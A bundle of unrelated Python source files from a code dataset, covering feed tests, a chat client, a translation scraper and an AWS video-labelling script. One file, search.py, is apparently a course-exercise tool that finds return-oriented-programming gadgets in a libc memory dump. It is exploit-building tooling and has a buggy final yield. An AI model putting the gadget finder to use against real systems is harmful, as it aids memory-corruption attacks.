feed[\"links\"][1][\"rel\"] == \"alternate\"\n assert feed[\"links\"][1][\"type\"] == \"text/html\"\n\n\ndef test_with_no_annotations():\n feed = atom_feed._feed_from_annotations(\n annotations=[], atom_url=None,\n annotation_url=_mock_annotation_url_function())\n\n assert feed[\"entries\"] == []\n\n\ndef test_annotation_with_no_target():\n annotation = factories.Annotation()\n del annotation[\"target\"]\n\n feed = atom_feed._feed_from_annotations(\n [annotation], atom_url=None,\n annotation_url=_mock_annotation_url_function())\n\n assert feed[\"entries\"][0][\"content\"] == annotation[\"text\"]\n\n\ndef test_annotation_with_no_text():\n text = \"Some annotated text from a web page\"\n annotation = factories.Annotation(exact_text=text)\n del annotation[\"text\"]\n\n feed = atom_feed._feed_from_annotations(\n [annotation], atom_url=None,\n annotation_url=_mock_annotation_url_function())\n\n assert feed[\"entries\"][0][\"content\"] == (\n \"<blockquote>{text}</blockquote>\".format(text=text))\n\n\ndef test_annotation_with_no_text_or_target():\n annotation = factories.Annotation()\n del annotation[\"target\"]\n del annotation[\"text\"]\n\n feed = atom_feed._feed_from_annotations(\n [annotation], atom_url=None,\n annotation_url=_mock_annotation_url_function())\n\n assert feed[\"entries\"][0][\"content\"] == \"\"\n\n\ndef test_annotation_with_no_document():\n annotation = factories.Annotation()\n del annotation[\"document\"]\n\n feed = atom_feed._feed_from_annotations(\n [annotation], atom_url=None,\n annotation_url=_mock_annotation_url_function())\n\n assert feed[\"entries\"][0][\"title\"] == \"\"\n\n\ndef test_annotation_with_no_document_title():\n annotation = factories.Annotation()\n del annotation[\"document\"][\"title\"]\n\n feed = atom_feed._feed_from_annotations(\n [annotation], atom_url=None,\n annotation_url=_mock_annotation_url_function())\n\n assert feed[\"entries\"][0][\"title\"] == \"\"\n\n\ndef test_annotation_with_non_unicode_characters():\n username = u\"seanh\\u2119h\"\n exact_text = u\"Some selected \\u01b4 non-ascii text\"\n document_title = u\"Non-ascii \\u2602 title\"\n text = u\"Some non-ascii \\u210c annotation text\"\n annotation = factories.Annotation(\n username=username,\n exact_text=exact_text,\n document_title=document_title,\n text=text)\n\n feed = atom_feed._feed_from_annotations(\n [annotation], atom_url=None,\n annotation_url=_mock_annotation_url_function())\n\n entry = feed[\"entries\"][0]\n assert entry[\"author\"][\"name\"] == username\n assert exact_text in entry[\"content\"]\n assert entry[\"title\"] == document_title\n assert text in entry[\"content\"]\n\n\ndef test_annotation_with_targets():\n annotation = factories.Annotation()\n annotation2 = factories.Annotation()\n\n target1 = annotation[\"target\"][0]\n target2 = annotation2[\"target\"][0]\n\n annotation[\"target\"] = [target1, target2]\n\n feed = atom_feed._feed_from_annotations(\n [annotation], atom_url=None,\n annotation_url=_mock_annotation_url_function())\n\n assert len(feed[\"entries\"][0][\"links\"]) == 3\n assert feed[\"entries\"][0][\"links\"][1][\"rel\"] == \"related\"\n assert feed[\"entries\"][0][\"links\"][1][\"href\"] == target1[\"source\"]\n assert feed[\"entries\"][0][\"links\"][2][\"rel\"] == \"related\"\n assert feed[\"entries\"][0][\"links\"][2][\"href\"] == target2[\"source\"]\n\n\ndef test_malformed_target():\n # This annotation has a broken target (a dict instead of a list), but we\n # shouldn't explode in this case.\n annotation = factories.Annotation()\n annotation['target'] = {\n 'selector': [\n {'start': None, 'end': None, 'type': 'TextPositionSelector'},\n {'exact': None, 'prefix': None, 'type': 'TextQuoteSelector', 'suffix': None}\n ]\n }\n\n feed = atom_feed._feed_from_annotations(\n [annotation],\n atom_url=None,\n annotation_url=_mock_annotation_url_function())\n\n assert len(feed[\"entries\"]) == 1\n","sub_path":"h/test/atom_feed_test.py","file_name":"atom_feed_test.py","file_ext":"py","file_size_in_byte":12382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"447727962","text":"from string import ascii_lowercase\ndef to_encrypt(text, delta):\n code = 'abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyz'\n text = list(text)\n decrypt = []\n for elem in text:\n if elem in ascii_lowercase:\n decrypt.append(code[ascii_lowercase.index(elem) + delta])\n else:\n decrypt.append(elem)\n return ''.join(decrypt)\n\nprint(to_encrypt(\"a b c\", 3))\n","sub_path":"CheckIO/Home/caesar_cypher_encryptor.py","file_name":"caesar_cypher_encryptor.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"31501805","text":"\nimport json\nimport boto3\nimport cv2\nimport math\nimport io\n\ndef analyzeVideo():\n videoFile = \"cavity.mp4\"\n projectVersionArn = \"arn:aws:rekognition:us-east-2:695748283885:project/testTeeth/version/testTeeth.2021-06-01T14.55.16/1622577316603\"\n\n rekognition = boto3.client('rekognition', region_name = 'us-east-2') \n customLabels = ['hello'] \n cap = cv2.VideoCapture(videoFile)\n frameRate = cap.get(5) #frame rate\n while(cap.isOpened()):\n frameId = cap.get(1) #current frame number\n print(\"Processing frame id: {}\".format(frameId))\n ret, frame = cap.read()\n if (ret != True):\n break\n if (frameId % math.floor(frameRate) == 0):\n hasFrame, imageBytes = cv2.imencode(\".jpg\", frame)\n\n if(hasFrame):\n response = rekognition.detect_custom_labels(\n Image={\n 'Bytes': imageBytes.tobytes(),\n },\n ProjectVersionArn = projectVersionArn\n )\n \n for elabel in response[\"CustomLabels\"]:\n elabel[\"Timestamp\"] = (frameId/frameRate)*1000\n customLabels.append(elabel)\n \n print(customLabels)\n\n with open(videoFile + \".json\", \"w\") as f:\n f.write(json.dumps(customLabels)) \n\n cap.release()\n\nanalyzeVideo()","sub_path":"hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"105195981","text":"#!/usr/bin/env python\nimport os\nfrom datetime import datetime\n\nstarting_dir = \".\"\n\nall_files = []\n\nfor curr_dir, dir_list, file_list in os.walk(starting_dir):\n if '.git' in dir_list:\n dir_list.remove('.git')\n print(curr_dir)\n for file_name in file_list:\n if file_name.endswith('.py'):\n file_path = os.path.join(curr_dir, file_name)\n file_size = os.path.getsize(file_path)\n raw_timestamp = os.path.getmtime(file_path)\n timestamp = datetime.fromtimestamp(raw_timestamp).date()\n\n all_files.append(\n (file_path, file_size, timestamp)\n )\n # print(\" {:5d} {} {}\".format(file_size, timestamp, file_name))\n\nprint(all_files[:10])\nprint()\n\nfor file_entry in sorted(all_files, key=lambda e: e[2]):\n print(file_entry)\n","sub_path":"walking_directories.py","file_name":"walking_directories.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"42296168","text":"import hashlib, time\nimport urllib.request\nimport sys\nimport re, requests, time\nfrom lxml import etree\n\ntyp = sys.getfilesystemencoding()\n\n\ndef translate1(querystr, to_l=\"zh\", from_l=\"en\"): # \"en\", \"fr\", \"auto\"\n '''for google tranlate by doom\n '''\n t = list(querystr)\n for i in range(0, len(t)):\n if ord(t[i]) > 127:\n t[i] = \"+\"\n querystr = ''.join(t)\n # print(querystr)\n C_agent = {\n 'User-Agent': \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.165063 Safari/537.36 AppEngine-Google.\"}\n flag = 'class=\"t0\">'\n tarurl = \"https://translate.google.com/?source=gtx_c#view=home&op=translate&sl=zh-CN&tl=en&text={}\".format(\n querystr.replace(\" \",\n \"+\")) # \"http://translate.google.com/m?hl=%s&sl=%s&q=%s\" % (to_l, from_l, querystr.replace(\" \", \"+\"))\n\n request = urllib.request.Request(tarurl, headers=C_agent)\n page = str(urllib.request.urlopen(request).read().decode(typ))\n target = page[page.find(flag) + len(flag):]\n target = target.split(\"<\")[0]\n return target\n\n\ndef translate(querystr, to_l=\"zh\", from_l=\"en\"): # \"en\", \"fr\", \"auto\"\n '''for google tranlate by doom\n '''\n t = list(querystr)\n for i in range(0, len(t)):\n if ord(t[i]) > 127:\n t[i] = \"+\"\n querystr = ''.join(t)\n # print(querystr)\n C_agent = {\n 'User-Agent': \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.165063 Safari/537.36 AppEngine-Google.\"}\n flag = 'class=\"t0\">'\n tarurl = \"http://translate.google.com/m?hl=%s&sl=%s&q=%s\" % (\n to_l, from_l, querystr.replace(\" \", \"+\")) # http://translate.google.com/m?hl=zh&sl=en&q=Summary.\n print(tarurl)\n data = requests.get(tarurl, headers=C_agent)\n time.sleep(0.1) ##\n response = etree.HTML(data.text)\n # print(data.text)\n result1 = response.xpath(\"//div[@class='result-container']/text()\")\n result2 = response.xpath(\"//div[@dir]/text()\")\n if len(result1) > 0:\n return result1[0]\n if len(result2) > 0:\n return result2[0]\n # return result1 or result2\n\n\nk = 0\n\nf1 = open(\"source.pts\", encoding='UTF-8')\nf = hashlib.md5()\nf.update(\"\".join(f1.readlines()).encode(\"utf-8\"))\nt0 = f.hexdigest()\nf1.close()\nprint(\"let's go\")\nwhile True:\n # print(\"this is a turn %d\" %(k))\n k += 1\n f1 = open(\"source.pts\", encoding='UTF-8')\n f = hashlib.md5()\n f.update(\"\".join(f1.readlines()).encode(\"utf-8\"))\n t1 = f.hexdigest()\n f1.close()\n\n if t1 == t0:\n pass\n else:\n t0 = t1\n o = open(\"target.pts\", \"w\", encoding=\"utf-8\")\n s = \"\"\n t = open(\"source.pts\", encoding='UTF-8')\n while 1:\n line = t.readline()\n if not line:\n break\n s += line.replace(\"\\n\", \" \")\n\n ###########\n s = s.replace(\"et al.\", \"et al+\").replace(\"etc.\", \"etc+\").replace(\"e.g.\", \"e+g+\").replace(\"i.e.\",\n \"i+e+\").replace(\n \"U.S.\", \"U+S+\").replace(\"Ph.D.\", \"PhD\").replace(\"e. g.\", \"e+g+\").replace(\"i. e.\", \"i+e+\")\n\n decimals = re.findall(\"(\\d+\\.\\d+)\", s)\n for _ in decimals:\n decimal = _.replace(\".\", \",\")\n s = s.replace(_, decimal)\n s = s.strip() # delete blank characters.\n # print(s)\n # print(s)\n\n ########## Edition 1\n for sen in re.split(\"\\.|\\?\", s):\n sen = sen.strip()\n # print(sen)\n if sen != \"\":\n o.write(sen + \".\" + \"\\n\")\n # print(sen + \".\")\n o.write(translate(sen + \".\") + \"\\n\" + \"\\n\")\n\n o.close()\n t.close()\n\n time.sleep(2)\n\n# print (md5.new(f1.read()).digest() == md5.new(f2.read()).digest())","sub_path":"paper_translating_scripts/md.py","file_name":"md.py","file_ext":"py","file_size_in_byte":3830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"60997293","text":"# pylint: disable=redefined-outer-name\n# pylint: disable=unused-argument\n# pylint: disable=unused-variable\n\nimport hashlib\nimport tempfile\nfrom pathlib import Path\nfrom pprint import pformat\nfrom uuid import uuid4\n\nimport pytest\nfrom fastapi import UploadFile\nfrom models_library.api_schemas_storage import FileMetaDataGet as StorageFileMetaData\nfrom pydantic import ValidationError\nfrom simcore_service_api_server.models.schemas.files import File\nfrom simcore_service_api_server.modules.storage import to_file_api_model\n\nFILE_CONTENT = \"This is a test\"\n\n\n@pytest.fixture\ndef mock_filepath(tmpdir) -> Path:\n path = Path(tmpdir) / \"mock_filepath.txt\"\n path.write_text(FILE_CONTENT)\n return path\n\n\n@pytest.fixture\ndef expected_md5sum():\n #\n # $ echo -n \"This is a test\" | md5sum -\n # ce114e4501d2f4e2dcea3e17b546f339 -\n #\n expected_md5sum = \"ce114e4501d2f4e2dcea3e17b546f339\"\n assert hashlib.md5(FILE_CONTENT.encode()).hexdigest() == expected_md5sum\n return expected_md5sum\n\n\nasync def test_create_filemetadata_from_path(mock_filepath, expected_md5sum):\n file_meta = await File.create_from_path(mock_filepath)\n assert file_meta.checksum == expected_md5sum\n\n\nasync def test_create_filemetadata_from_starlette_uploadfile(\n mock_filepath, expected_md5sum\n):\n # WARNING: upload is a wrapper around a file handler that can actually be in memory as well\n\n # in file\n with open(mock_filepath, \"rb\") as file:\n upload = UploadFile(mock_filepath.name, file)\n\n assert upload.file.tell() == 0\n file_meta = await File.create_from_uploaded(upload)\n assert upload.file.tell() > 0, \"modifies current position is at the end\"\n\n assert file_meta.checksum == expected_md5sum\n\n # in memory\n # UploadFile constructor: by not passing file, it enforces a tempfile.SpooledTemporaryFile\n upload_in_memory = UploadFile(mock_filepath.name)\n\n assert isinstance(upload_in_memory.file, tempfile.SpooledTemporaryFile)\n await upload_in_memory.write(FILE_CONTENT.encode())\n\n await upload_in_memory.seek(0)\n assert upload_in_memory.file.tell() == 0\n\n file_meta = await File.create_from_uploaded(upload_in_memory)\n assert upload_in_memory.file.tell() > 0, \"modifies current position is at the end\"\n\n\ndef test_convert_between_file_models():\n\n storage_file_meta = StorageFileMetaData(\n **StorageFileMetaData.Config.schema_extra[\"examples\"][1]\n )\n storage_file_meta.file_id = f\"api/{uuid4()}/extensionless\"\n apiserver_file_meta = to_file_api_model(storage_file_meta)\n\n assert apiserver_file_meta.id\n assert apiserver_file_meta.filename == \"extensionless\"\n assert apiserver_file_meta.content_type == \"application/octet-stream\" # default\n assert apiserver_file_meta.checksum == storage_file_meta.entity_tag\n\n with pytest.raises(ValueError):\n storage_file_meta.file_id = f\"{uuid4()}/{uuid4()}/foo.txt\"\n to_file_api_model(storage_file_meta)\n\n with pytest.raises(ValidationError):\n storage_file_meta.file_id = \"api/NOTUUID/foo.txt\"\n to_file_api_model(storage_file_meta)\n\n\n@pytest.mark.parametrize(\"model_cls\", (File,))\ndef test_file_model_examples(model_cls, model_cls_examples):\n for name, example in model_cls_examples.items():\n print(name, \":\", pformat(example))\n\n model_instance = model_cls(**example)\n\n assert model_instance, f\"Failed with {name}\"\n print(name, \":\", model_instance)\n\n assert model_instance.content_type is not None\n","sub_path":"services/api-server/tests/unit/test_models_schemas_files.py","file_name":"test_models_schemas_files.py","file_ext":"py","file_size_in_byte":3505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"514317468","text":"import wx, socket, threading,json,time\n\nclass ChatFrame(wx.Frame):\n def __init__(self):\n default_size = (600,600)\n wx.Frame.__init__(self,None,-1, '聊天室', size=default_size)\n self.SetMaxSize(default_size) #与下一行的作用是固定大小\n self.SetMinSize(default_size)\n self.panel = wx.Panel(self,-1)\n self.panel.SetFocus()\n self.sock = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)\n self.server_addr = ('123.207.170.247',8000)\n #self.server_addr = ('127.0.0.1',8000)\n dlg = wx.TextEntryDialog(None,'请设置昵称:','昵称','')\n if dlg.ShowModal() == wx.ID_OK:\n nickname = dlg.GetValue()\n else:\n nickname = 'user%s'%(int(time.time()))\n dlg.Destroy()\n self.nickname = nickname\n self.cur_members = []\n self.initUI()\n self.updateUI()\n self.Show()\n\n def Destroy(self):\n data = dict(action='Quit',userid=self.userid)\n self.send(data)\n return super().Destroy()\n\n def initUI(self):\n self.roomlistctrl = wx.ListBox(self.panel,-1,choices=['未连接'],size = (100,500))\n self.createroombutton = wx.Button(self.panel,0,'创建房间',size=(100,100))\n self.sessionareactrl = wx.TextCtrl(self.panel,-1,style=wx.TE_MULTILINE | wx.TE_READONLY,size=(400,400))\n self.memberctrl = wx.ListBox(self.panel,-1,choices=[],size = (100,400))\n self.inputctrl = wx.TextCtrl(self.panel,-1,style=wx.TE_MULTILINE,size=(400,200))\n self.sendbutton = wx.Button(self.panel,1,'发送',size=(100,200))\n self.inputctrl.SetFocus()\n self.sessionareactrl.SetEditable(False)\n self.sessionareactrl.SetCanFocus(False)\n self.roomlistctrl.Bind(wx.EVT_LISTBOX_DCLICK, self.OnJoinRoom)\n self.createroombutton.Bind(wx.EVT_BUTTON, self.OnCreateRoom)\n self.sendbutton.Bind(wx.EVT_BUTTON, self.OnSend)\n sizer1 = wx.BoxSizer(orient = wx.VERTICAL)\n sizer1.Add(self.roomlistctrl)\n sizer1.Add(self.createroombutton)\n sizer2 = wx.BoxSizer()\n sizer2.Add(self.sessionareactrl)\n sizer2.Add(self.memberctrl)\n sizer3 = wx.BoxSizer()\n sizer3.Add(self.inputctrl)\n sizer3.Add(self.sendbutton)\n sizer4 = wx.BoxSizer(orient = wx.VERTICAL)\n sizer4.Add(sizer2)\n sizer4.Add(sizer3)\n sizer = wx.BoxSizer()\n sizer.Add(sizer1)\n sizer.Add(sizer4)\n self.panel.SetSizer(sizer)\n\n def updateuithd(self):\n self.connect()\n while True:\n data=self.sock.recvfrom(102400)\n data = str(data[0], 'utf-8')\n data = json.loads(data)\n print(data)\n retcode = data['retcode']\n if retcode==0:\n wx.CallAfter(self.sessionareactrl.AppendText,data['message']+'\\n')\n if 'userid' in data:\n self.userid = data['userid']\n if 'roomlist' in data:\n roomdict = data['roomlist']\n self.roomlist = [(k,roomdict[k]) for k in roomdict]\n roomchoice = [x[1] for x in self.roomlist]\n wx.CallAfter(self.roomlistctrl.Set,roomchoice)\n if 'roomid' in data:\n self.roomid = data['roomid']\n if 'members' in data:\n self.cur_members =[(k, data['members'][k]) for k in data['members']]\n memberschoice = [x[1] for x in self.cur_members]\n wx.CallAfter(self.memberctrl.Set,memberschoice)\n elif retcode==1:\n msg = '[%(_from)s] : %(message)s\\n'%data\n wx.CallAfter(self.sessionareactrl.AppendText,msg)\n elif retcode==2:\n action = data['action']\n if action =='AddRoom':\n if (data['roomid'],data['roomname']) in self.roomlist:\n continue\n self.roomlist.insert(0,(data['roomid'],data['roomname']))\n wx.CallAfter(self.roomlistctrl.InsertItems,[data['roomname']], 0)\n elif action == 'JoinRoom':\n if (data['userid'],data['nickname']) in self.cur_members:\n continue\n self.cur_members.insert(0,(data['userid'],data['nickname']))\n wx.CallAfter(self.memberctrl.InsertItems,[data['nickname']], 0)\n wx.CallAfter(self.sessionareactrl.AppendText,'[系统消息] : [%(nickname)s]进入房间了!\\n'%data)\n elif action == 'ExitRoom':\n userid = data['userid']\n nickname = data['nickname']\n if (userid,nickname) not in self.cur_members:\n continue\n index = self.cur_members.index((userid,nickname))\n self.cur_members.pop(index)\n wx.CallAfter(self.memberctrl.Delete, index)\n elif action == 'DelRoom':\n roomid = data['roomid']\n roomname = data['roomname']\n if (roomid,roomname) not in self.roomlist:\n continue\n index = self.roomlist.index((roomid,roomname))\n self.roomlist.pop(index)\n wx.CallAfter(self.roomlistctrl.Delete,index)\n wx.CallAfter(self.sessionareactrl.AppendText, '[系统消息] : 房间[%s]被系统删除了!\\n'%roomname)\n elif retcode==-1:\n print(data['message'])\n\n def updateUI(self):\n thd = threading.Thread(target= self.updateuithd)\n thd.setDaemon(True)\n thd.start()\n\n def send(self,data):\n data = bytes(json.dumps(data),'utf-8')\n self.sock.sendto(data,self.server_addr)\n\n def connect(self):\n data = dict(action='Connection',nickname=self.nickname)\n self.send(data)\n\n def OnJoinRoom(self,evt):\n index = evt.Selection\n roomid = self.roomlist[index][0]\n data = dict(action='JoinRoom',userid = self.userid,roomid=roomid)\n self.send(data)\n\n def OnCreateRoom(self,evt):\n dlg = wx.TextEntryDialog(None,'房间名:','房间名','')\n if dlg.ShowModal() == wx.ID_OK:\n roomname = dlg.GetValue()\n else:\n dlg.Destroy()\n return\n dlg.Destroy()\n data = dict(action='CreateRoom',userid = self.userid,roomname=roomname)\n self.send(data)\n\n def OnSend(self,evt):\n text = self.inputctrl.GetValue()\n data = dict(action='Chat', userid = self.userid,message=text)\n self.send(data)\n self.inputctrl.SetValue('')\n\nif __name__=='__main__':\n app = wx.App()\n frame = ChatFrame()\n app.MainLoop()","sub_path":"xuegod/ryn大神/chatingroomclient.py","file_name":"chatingroomclient.py","file_ext":"py","file_size_in_byte":6793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"127382640","text":"import assemble\nimport string, mmap, itertools\n\nGENERAL_REGISTERS = [\n 'eax', 'ebx', 'ecx', 'edx', 'esi', 'edi'\n]\n\n\nALL_REGISTERS = GENERAL_REGISTERS + [\n 'esp', 'eip', 'ebp'\n]\n\n\nclass GadgetSearch(object):\n def __init__(self, dump_path, start_addr):\n \"\"\"\n Construct the GadgetSearch object.\n\n Input:\n dump_path: The path to the memory dump file created with GDB.\n start_addr: The starting memory address of this dump.\n \"\"\"\n self.path = dump_path\n self.sa = start_addr\n\n def get_format_count(self, gadget_format):\n \"\"\"\n Get how many different register placeholders are in the pattern.\n \n Examples:\n self.get_format_count('POP ebx')\n => 0\n self.get_format_count('POP {0}')\n => 1\n self.get_format_count('XOR {0}, {0}; ADD {0}, {1}')\n => 2\n \"\"\"\n # Hint: Use the string.Formatter().parse method:\n # import string\n # print string.Formatter().parse(gadget_format)\n found = []\n for _, field_name, _, _ in string.Formatter().parse(gadget_format):\n if field_name is not None and field_name not in found:\n found.append(field_name)\n return len(found)\n\n def get_register_combos(self, nregs, registers):\n \"\"\"\n Return all the combinations of `registers` with `nregs` registers in\n each combination. Duplicates ARE allowed!\n\n Example:\n self.get_register_combos(2, ('eax', 'ebx'))\n => [['eax', 'eax'],\n ['eax', 'ebx'],\n ['ebx', 'eax'],\n ['ebx', 'ebx']]\n \"\"\"\n return list(itertools.product(registers, repeat = nregs))\n\n def format_all_gadgets(self, gadget_format, registers):\n \"\"\"\n Format all the possible gadgets for this format with the given\n registers.\n\n Example:\n self.format_all_gadgets(\"POP {0}; ADD {0}, {1}\", ('eax', 'ecx'))\n => ['POP eax; ADD eax, eax',\n 'POP eax; ADD eax, ecx',\n 'POP ecx; ADD ecx, eax',\n 'POP ecx; ADD ecx, ecx']\n \"\"\"\n # Hints:\n # 1. Use the format function:\n # 'Hi {0}! I am {1}, you are {0}'.format('Luke', 'Vader')\n # => 'Hi Luke! I am Vader, you are Luke'\n # 2. You can use an array instead of specifying each argument. Use the\n # internet, the force is strong with StackOverflow.\n nregs = self.get_format_count(gadget_format)\n if nregs == 0:\n return [gadget_format]\n combinations = self.get_register_combos(nregs, registers)\n gadget_string = [gadget_format]*len(combinations)\n i = 0\n for combo in combinations:\n for regs in zip(*[iter(combo)]*nregs):\n gadget_string[i] = gadget_string[i].format(*regs)\n i += 1\n return gadget_string\n\n def find_all(self, gadget):\n \"\"\"\n Return all the addresses of the gadget inside the memory dump.\n\n Example:\n self.find_all('POP eax')\n => < all ABSOLUTE addresses in memory of 'POP eax; RET' >\n \"\"\"\n # Notes:\n # 1. Addresses are ABSOLUTE (for example, 0x08403214), NOT RELATIVE to the\n # beginning of the file (for example, 12).\n # 2. Don't forget to add the 'RET'\n addresses = []\n offset = 0\n gadget_opcodes = assemble.assemble_data(gadget+'; RET')\n with open(self.path, \"rw+b\") as lib_c:\n #string = read(lib_c)\n #offset = string.find(gadget_opcodes, offset)\n memmap = mmap.mmap(lib_c.fileno(),0)\n offset = memmap.find(gadget_opcodes, offset)\n while(offset != -1):\n addresses.append(self.sa + offset)\n offset = memmap.find(gadget_opcodes, offset+1)\n yield self.sa + offset\n\n def find(self, gadget, condition=None):\n \"\"\"\n Return the first result of find_all. If condition is specified, only\n consider addresses that meet the condition.\n \"\"\"\n condition = condition or (lambda x: True)\n try:\n return next(addr for addr in self.find_all(gadget) if condition(addr))\n except StopIteration:\n raise ValueError(\"Couldn't find matching address for \" + gadget)\n\n def find_all_formats(self, gadget_format, registers=GENERAL_REGISTERS):\n \"\"\"\n Similar to find_all - but return all the addresses of all\n possible gadgets that can be created with this format and registers.\n Every elemnt in the result will be a tuple of the gadget string and\n the address in which it appears.\n\n Example:\n self.find_all_formats('POP {0}; POP {1}')\n => [('POP eax; POP ebx', address1),\n ('POP ecx; POP esi', address2),\n ...]\n \"\"\" \n for formatted_gadget in self.format_all_gadgets(gadget_format, registers):\n for address in self.find_all(formatted_gadget):\n yield [formatted_gadget, address]\n\n def find_format(self, gadget_format, registers=GENERAL_REGISTERS, condition=None):\n \"\"\"\n Return the first result of find_all_formats. If condition is specified,\n only consider addresses that meet the condition.\n \"\"\"\n condition = condition or (lambda x: True)\n try:\n return next(\n addr for addr in self.find_all_formats(gadget_format, registers)\n if condition(addr))\n except StopIteration:\n raise ValueError(\n \"Couldn't find matching address for \" + gadget_format)","sub_path":"5/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":5740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"589087128","text":"import os\nimport re\nimport wx\nimport random\nimport wx.html2 as webview\nimport mysql.connector as mariadb\nimport sshtunnel\nfrom ObjectListView import ObjectListView, ColumnDefn\nfrom datetime import datetime\nimport paramiko\nimport tempfile\nimport zipfile\nimport shutil\nimport multiprocessing\nimport sqlite3\nfrom config import *\nfrom log_processing import *\nimport threading\n\ndhi_message = []\n\nclass Almanah(object):\n\n # ----------------------------------------------------------------------\n def __init__(self, date, external_id, stan, rrn, card_number, filename, resp_code, direction):\n \"\"\"Constructor\"\"\"\n self.date = date\n self.external_id = external_id\n self.stan = stan\n self.rrn = rrn\n self.card_number = card_number\n self.filename = filename\n self.resp_code = resp_code\n self.direction = direction\n\n\n########################################################################\nclass logPanel(wx.Panel):\n \"\"\"\"\"\"\n\n # ----------------------------------------------------------------------\n def __init__(self, parent):\n \"\"\"Constructor\"\"\"\n wx.Panel.__init__(self, parent, style=wx.NO_FULL_REPAINT_ON_RESIZE)\n self.data = []\n\n self.comboCtrl = wx.ComboBox(self, -1, size=(60, -1), choices=['PROD', 'TEST'], style=wx.CB_READONLY)\n self.comboCtrl.SetValue('PROD')\n\n ldst = wx.StaticText(self, label=\"Start Date\")\n lded = wx.StaticText(self, label=\"End Date\")\n limid = wx.StaticText(self, label=\"Request ID\")\n lrrn = wx.StaticText(self, label=\"RRN\")\n lstan = wx.StaticText(self, label=\"STAN\")\n lcard = wx.StaticText(self, label=\"CARD\")\n self.card = wx.TextCtrl(self)\n self.card.SetMaxLength(20)\n self.timid = wx.TextCtrl(self)\n self.timid.SetMaxLength(16)\n self.tstan = wx.TextCtrl(self)\n self.tstan.SetMaxLength(6)\n self.trrn = wx.TextCtrl(self, )\n self.trrn.SetMaxLength(12)\n # self.card.AppendText('5469550038327711')\n urlBtn = wx.Button(self, label=\"Get Transactions\")\n urlBtn.Bind(wx.EVT_BUTTON, self.get_data)\n\n clnBtn = wx.Button(self, label=\"Clean Cache\")\n clnBtn.Bind(wx.EVT_BUTTON, self.clean_cache)\n\n self.dst = wx.adv.DatePickerCtrl(self, size=(120, -1),\n style=wx.adv.DP_DROPDOWN\n | wx.adv.DP_SHOWCENTURY\n | wx.adv.DP_ALLOWNONE)\n self.ded = wx.adv.DatePickerCtrl(self, size=(120, -1),\n style=wx.adv.DP_DROPDOWN\n | wx.adv.DP_SHOWCENTURY\n | wx.adv.DP_ALLOWNONE)\n\n self.almOlv = ObjectListView(self,\n style=wx.LC_REPORT | wx.SUNKEN_BORDER)\n self.almOlv.SetEmptyListMsg(\"No data\")\n self.almOlv.Bind(wx.EVT_LIST_ITEM_SELECTED, self.on_select)\n self.almOlv.Bind(wx.EVT_LIST_ITEM_RIGHT_CLICK, self.on_right_click)\n self.fitcpTxt = webview.WebView.New(self)\n self.frntnTxt = webview.WebView.New(self)\n\n self.inboundTxt = webview.WebView.New(self)\n self.outboundTxt = webview.WebView.New(self)\n\n # add sizers\n rowSizer = wx.BoxSizer(wx.HORIZONTAL)\n rowSizer.Add(clnBtn, 0, wx.ALL, 5)\n rowSizer.Add(self.comboCtrl, 0, wx.ALL, 5)\n rowSizer.Add(ldst, 0, wx.ALL, 5)\n rowSizer.Add(self.dst, 0, wx.ALL, 5)\n rowSizer.Add(lded, 0, wx.ALL, 5)\n rowSizer.Add(self.ded, 0, wx.ALL, 5)\n rowSizer.Add(limid, 0, wx.ALL, 5)\n rowSizer.Add(self.timid, 1, wx.EXPAND | wx.ALL, 5)\n rowSizer.Add(lrrn, 0, wx.ALL, 5)\n rowSizer.Add(self.trrn, 1, wx.EXPAND | wx.ALL, 5)\n rowSizer.Add(lstan, 0, wx.ALL, 5)\n rowSizer.Add(self.tstan, 1, wx.EXPAND | wx.ALL, 5)\n rowSizer.Add(lcard, 0, wx.ALL, 5)\n rowSizer.Add(self.card, 1, wx.EXPAND | wx.ALL, 5)\n rowSizer.Add(urlBtn, 0, wx.ALL, 5)\n\n vSizer = wx.BoxSizer(wx.VERTICAL)\n vSizer.Add(self.almOlv, 5, wx.EXPAND | wx.ALL, 5)\n vSizer.Add(self.fitcpTxt, 5, wx.EXPAND | wx.ALL, 5)\n vSizer.Add(self.frntnTxt, 5, wx.EXPAND | wx.ALL, 5)\n\n dispSizer = wx.BoxSizer(wx.HORIZONTAL)\n dispSizer.Add(vSizer, 1, wx.EXPAND | wx.ALL, 5)\n dispSizer.Add(self.inboundTxt, 2, wx.EXPAND | wx.ALL, 5)\n dispSizer.Add(self.outboundTxt, 2, wx.EXPAND | wx.ALL, 5)\n\n mainSizer = wx.BoxSizer(wx.VERTICAL)\n mainSizer.Add(rowSizer, 0, wx.EXPAND)\n mainSizer.Add(dispSizer, 1, wx.EXPAND)\n self.SetSizer(mainSizer)\n\n self.update_display()\n\n # ----------------------------------------------------------------------\n\n def save_dialog(self):\n\n dlg = wx.FileDialog(self, \"Save DHI as...\", os.getcwd(), \"\", \"Text document (*.txt)|*.txt\",\n wx.FD_SAVE | wx.FD_OVERWRITE_PROMPT)\n result = dlg.ShowModal()\n inFile = dlg.GetPath()\n dlg.Destroy()\n\n if result == wx.ID_OK: # Save button was pressed\n return inFile\n # save(window, inFile)\n #return True\n elif result == wx.ID_CANCEL: # Either the cancel button was pressed or the window was closed\n return False\n\n def clean_cache(self, event):\n \"\"\"\n Clean cache files if exists\n \"\"\"\n env = 